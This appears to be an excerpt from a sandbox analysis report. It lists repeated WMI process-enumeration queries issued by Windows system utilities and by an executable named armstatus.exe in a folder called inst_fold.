Source: C:\Windows\System32\find.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\find.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\find.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\inst_fold\armstatus.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\inst_fold\armstatus.exe	WMI Queries: IWbemServices::ExecMethod - \\computer\root\cimv2:Win32_Process.Handle="4"::GetOwner
Source: C:\inst_fold\armstatus.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\inst_fold\armstatus.exe	WMI Queries: IWbemServices::ExecMethod - \\computer\root\cimv2:Win32_Process.Handle="4"::GetOwner
Source: C:\inst_fold\armstatus.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\inst_fold\armstatus.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\inst_fold\armstatus.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\inst_fold\armstatus.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cscript.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cscript.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cscript.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cscript.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cscript.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cscript.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\timeout.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\timeout.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\timeout.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecMethod - \\computer\root\cimv2:Win32_Process.Handle="4"::GetOwner
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecMethod - \\computer\root\cimv2:Win32_Process.Handle="4"::GetOwner
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecMethod - \\computer\root\cimv2:Win32_Process.Handle="4"::GetOwner
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - \\computer\root\cimv2:Win32_Process.Handle="4"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\find.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\find.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\find.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\timeout.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\attrib.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\attrib.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\attrib.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\attrib.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\attrib.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\attrib.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\attrib.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\attrib.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
